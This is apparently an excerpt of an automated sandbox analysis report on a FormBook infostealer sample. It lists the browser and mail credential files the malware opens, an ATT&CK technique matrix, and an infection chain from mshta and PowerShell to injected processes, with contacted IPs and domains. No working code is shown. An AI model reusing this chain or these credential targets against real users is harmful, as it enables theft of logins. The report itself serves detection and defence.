                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                  Source: C:\Windows\SysWOW64\calc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\calc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                  Source: cosses.exeBinary or memory string: WIN_81
                  Source: cosses.exeBinary or memory string: WIN_XP
                  Source: cosses.exeBinary or memory string: WIN_XPe
                  Source: cosses.exeBinary or memory string: WIN_VISTA
                  Source: cosses.exeBinary or memory string: WIN_7
                  Source: cosses.exeBinary or memory string: WIN_8
                  Source: cosses[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.3816264439.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687105036.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817612189.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1684081260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.3819745162.0000000005830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3817513274.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1687168509.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.3817630308.0000000002340000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00186283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00186283
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00186747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00186747

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Command and Scripting Interpreter                  		2
                  Valid Accounts                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell                  		Logon Script (Windows)1
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares11
                  Email Collection                  		4
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                  Valid Accounts                  		3
                  Obfuscated Files or Information                  		NTDS128
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		14
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		LSA Secrets251
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                  Process Injection                  		1
                  Masquerading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem11
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640150 Sample: clearpicturewithmebestthing... Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 57 www.zeniow.xyz 2->57 59 www.vaishnavi.xyz 2->59 61 18 other IPs or domains 2->61 79 Suricata IDS alerts for network traffic 2->79 81 Antivirus detection for URL or domain 2->81 83 Multi AV Scanner detection for dropped file 2->83 87 8 other signatures 2->87 13 mshta.exe 1 2->13         started        signatures3 85 Performs DNS queries to domains with low reputation 59->85 process4 signatures5 113 Suspicious command line found 13->113 115 PowerShell case anomaly found 13->115 16 cmd.exe 1 13->16         started        process6 signatures7 71 Detected Cobalt Strike Beacon 16->71 73 Suspicious powershell command line found 16->73 75 PowerShell case anomaly found 16->75 19 powershell.exe 45 16->19         started        24 conhost.exe 16->24         started        process8 dnsIp9 63 172.245.123.24, 49717, 80 AS-COLOCROSSINGUS United States 19->63 49 C:\Users\user\AppData\Roaming\cosses.exe, PE32 19->49 dropped 51 C:\Users\user\AppData\Local\...\cosses[1].exe, PE32 19->51 dropped 53 C:\Users\user\AppData\...\fjq1drut.cmdline, Unicode 19->53 dropped 89 Loading BitLocker PowerShell Module 19->89 91 Powershell drops PE file 19->91 26 cosses.exe 2 19->26         started        29 csc.exe 3 19->29         started        file10 signatures11 process12 file13 103 Multi AV Scanner detection for dropped file 26->103 105 Binary is likely a compiled AutoIt script file 26->105 107 Writes to foreign memory regions 26->107 109 2 other signatures 26->109 32 svchost.exe 26->32         started        55 C:\Users\user\AppData\Local\...\fjq1drut.dll, PE32 29->55 dropped 35 cvtres.exe 1 29->35         started        signatures14 process15 signatures16 77 Maps a DLL or memory area into another process 32->77 37 hudFv7yP8kEYIbmJoqYH.exe 32->37 injected process17 signatures18 93 Found direct / indirect Syscall (likely to bypass EDR) 37->93 40 calc.exe 13 37->40         started        process19 signatures20 95 Tries to steal Mail credentials (via file / registry access) 40->95 97 Tries to harvest and steal browser information (history, passwords, etc) 40->97 99 Modifies the context of a thread in another process (thread injection) 40->99 101 3 other signatures 40->101 43 hudFv7yP8kEYIbmJoqYH.exe 40->43 injected 47 firefox.exe 40->47         started        process21 dnsIp22 65 shedsworld.shop 162.255.118.68, 49770, 49771, 49772 NAMECHEAP-NETUS United States 43->65 67 statusq.studio 13.248.243.5, 49762, 49763, 49764 AMAZON-02US United States 43->67 69 7 other IPs or domains 43->69 111 Found direct / indirect Syscall (likely to bypass EDR) 43->111 signatures23

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.